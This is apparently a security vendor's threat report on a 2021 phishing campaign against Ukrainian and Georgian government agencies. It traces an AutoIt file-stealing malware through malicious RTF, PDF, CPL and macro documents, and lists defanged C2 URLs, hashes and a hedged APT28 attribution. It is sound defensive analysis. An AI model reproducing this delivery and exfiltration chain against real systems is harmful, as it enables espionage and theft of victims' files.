In May 2021, Fortinet published a report about the early stages of an ongoing phishing attack against the Ukrainian government. The attack, initially based on the Saint Bot downloader, also targeted Georgia as reported by Malwarebytes. Since June we have seen this threat actor expand its operation with new samples targeting government entities in Georgia. In this report we will cover the new malware samples we found.
Method of Infection
The attack’s entry point is a spear phishing email referencing government-related topics including veterans, Ukraine’s Anti-Terrorist Operation (ATO), Georgia’s Internally Displaced Persons (IDPs), organizations in Georgia’s private sector and COVID-19. The attack mainly targets government agencies in Ukraine and Georgia.
The main payload delivered by the malware is an infostealer written in AutoIt. Its main goal is to steal files from the victim’s machine, uploading them to a predefined Command and control (C2) server.
Based on victimology and the fact that this attack tries to steal files from government entities, a classic goal of nation-state groups, it is likely operated by a Russian nation-state. There are also several similarities between this attack and past APT28 campaigns which we will discuss later.
Below we summarize the early stages of the attack and show the latest malware targeting government entities in Georgia. We assess with high confidence that this attack may expand its operations to target additional Eastern European countries.
The attack flow, described below, begins with a phishing email containing a malicious shortened URL. The URL redirects to a Command and control (C2) where a ZIP file or malicious document is hosted. The ZIP file contains a malicious file and in some emails also a harmless PDF file.
The malicious attachment varies between RTF, DOC, PDF, JS, LNK or EXE. Its main goal is to drop the packed payloads from the C2. The method in which a dropper contacts the C2 in order to deliver the packed payload varies between the different file types and stages of the attack. The packed executable loads an AutoIt payload into memory. The payload searches for files on the victim’s machine based on a list of file extensions and uploads them to a C2 that is hardcoded in the script.
An example of one of the phishing emails sent to the Ukrainian government is below. The threat actor references payments made to veterans of the Anti-Terrorist Operation (ATO).
Phishing email sent to the Ukrainian government. Translation from Ukrainian – Subject: “Payments to ATO Veterans.” Content: “It must be filled in and sent back.”
The link, masqueraded as a Ukrainian .gov domain, is actually a shortened URL (https[://]cutt[.]ly/WcBTVdf) which contacts http[://]gosloto[.]site/doc/form_request.doc and downloads form_request.doc to the victim’s machine. This document is an RTF file that once runs will present content related to the Israeli Merkava, the main battle tank used by the Israeli Defense Forces.
Reference to Israeli Merkava in the RTF file.
This file is incharge of dropping the final payload from the C2. In other phishing emails, this file is named NATO_06042021 (44697aad796c0d82c1adbee15fd1266b).
First we Take Kyiv, then we Take Tbilisi
Combined with continuous attacks against Ukraine, the threat actor has expanded its campaign to target government entities in Georgia. The following malicious documents were uploaded to VirusTotal from Georgia on June 17 and July 5.
2021-2022 Strategy Action Plan for IDPs.doc (translated from Georgian)
Change to 828.doc (translated from Georgian)
All three files have low detection rates in VirusTotal at the time of this writing. In the following sections we will describe each file’s behavior.
b56975725c4e260370af540f9c0b6709 in VirusTotal.
The PDF File
The PDF file, named “Georgia_Private_Sector_Poster_Inputs_06_2021.pdf,” was uploaded to VirusTotal on June 17, 2021.
The PDF contains an action object. Upon a victim opening the PDF it will send a query to Google containing the C2:
The system will prompt a security warning allowing the document to contact “http[:]//www.google.com.”
Action object in b56975725c4e260370af540f9c0b6709
System prompt message.
Once the document connects to Google a short series of network redirections occurs. First, Google will redirect to the C2’s URL. Then, as described in the image below, the C2 contains a frame with an src to another C2 URL (https[://]16868138130[.]space/000/), which then redirects to a shortened URL (https[://]qaz[.]im/load/rKtsZD/hDKKFD) using a meta refresh redirect. This will finally drop georgia_private_sector_poster_inputs_06_2021.cpl (02f0118bd15dabf727659b9fd27c86c9).
Network redirections for delivering the payload.
This redirection process, starting with Google as the first domain the PDF attempts to access, is an obvious Antivirus evasion technique.
georgia_private_sector_poster_inputs_06_2021.cpl is a DLL which upon clicking on it, runs under a trusted control panel process. The DLL is incharge of dropping and running the packed payload from the C2, 16868138130[.]space/000/000.exe (41af4d9fbd0bc719212b78cd7a1b89ec). The packed malware loads the AutoIt payload into memory.
The AutoIt script’s main goal is to upload files from the victim’s machine to a predefined C2. The main logic (see image below) calls the _filsearch function (two images below) which looks for files containing the following extensions:
_filsearch uses @ComSpec environment variable (which usually points to CMD). The process tree created by the AutoIt file is below.
Code snippet from the AutoIt script main logic.
Code snippet from the AutoIt script _filsearch function.
Process tree snippet in Intezer Analyze.
Each file is uploaded to the C2 via a multipart/form-data POST request. The file’s directory is sent as Hex. Below is an example of a file upload request.
Example of C_/Users/admin/AppData/Roaming/Microsoft/Windows/Cookies/NUT28OOW.txt file upload.
Lastly, the AutoIt script creates and runs a batch named “r.bat” which deletes the malware from disk and kills the process.
The Document Files
Both malicious Word documents uploaded to VirusTotal on July 5 display similar behavior. Let’s look at 900e892c8151f0f59a93af1206583ce6. Once a user opens this document, it will run a VBA macro with the main logic to create, write to and run a batch file named “ballDemocrat.bat.” The script written to the batch file will run a PowerShell command that drops an executable from the C2 (http[://]1221[.]site/15858415841/0407.exe) and saves it as centuryarticle.exe.
VBA script (7546f382d73231a4c1fdc58ab1535ec0) in the malicious document.
Process tree of 900e892c8151f0f59a93af1206583ce6
The file dropped from the C2 is a packed .NET file that loads the AutoIt payload into memory.
Possible Russian Connection
We noticed similarities between this attack and Russia’s APT28 campaigns. While these similarities alone are not enough to attribute APT28, victimology and intent to conduct espionage on various government entities in Eastern European regions gives us reason to believe that Russia is behind the attack.
- Victimology: APT28 has targeted Ukraine and Georgia in the past. 
- Phishing theme: APT28 previously used COVID-19-related phishing themes to target countries including Ukraine. APT28 also used NATO as a phishing theme in the past. 
- Use of AutoIt: One of Zebrocy’s (malware from APT28) variants is written in AutoIt. 
- File search with predefined extensions: Zebrocy searches for predefined file extensions on the victim machine. 
- Compressed file holding both malicious and benign files was used in an APT28 COVID-19 phishing attack last year and in other campaigns in the past. 
- Use of spear phishing emails containing URL-shortener was documented in past APT28 campaigns. In one of the campaigns, this URL hosted a ZIP file containing a benign PDF and a malicious executable. 
- Use of Hex encoding: The Zebrocy AutoIt version uses String to Hex encoding. 
- Use of batch files, PowerShell and CMD are part of APT28’s documented TTPs. 
Take the following precautions to keep your organization clean and safe from phishing attacks.
- Enhance social engineering awareness within your organization.
- Use an email gateway to analyze attachments and links. Intezer Analyze now supports analysis for Microsoft Office documents, PDFs and scripts.
- Conduct proactive threat hunting on all endpoints inside your organization to routinely ensure that no traces of malicious code or malware exist in-memory. Intezer’s live Endpoint Scanner can help you achieve this at scale by collecting all binaries running in-memory, including fileless, and classifying them using Genetic Code Analysis technology. We also have a Volatility plugin for analyzing memory dumps.
AutoIt Payload Script
The AutoIt script can be found in the following GitHub repository.
Packed AutoIT Infostealer
- CNBC, Russian Hackers Target NATO, Military Secrets
- FireEye, APT28: A Window Into Russia’s Cyber Espionage Operations?
- Kaspersky, GreyEnergy’s Overlap with Zebrocy
- Intezer, A Zebra in Gopher’s Clothing: Russian APT Uses COVID-19 Lures to Deliver Zebrocy
- Quointelligence, APT28 Delivers Zebrocy Malware Campaign using NATO Theme as Lure
- ESET, Sednit Update: Analysis of Zebrocy
- VK-Intel. Let’s Learn: Progression of APT28 AutoIt Zebrocy Downloaders: Source-Code Level Analysis
- ESET, A Journey to Zebrocy Land
- ESET, Sednit: What’s Going on with Zebrocy?
- Brady, S. Indictment – United States vs Aleksei Sergeyevich Morenets, et al.. Retrieved October 1, 2020
- Mueller, R. Indictment – United States of America vs. Viktor Borisovich Netyksho, et al. Retrieved September 13, 2018
- APT28 MITRE ATT&CK
- Zebrocy MITRE ATT&CK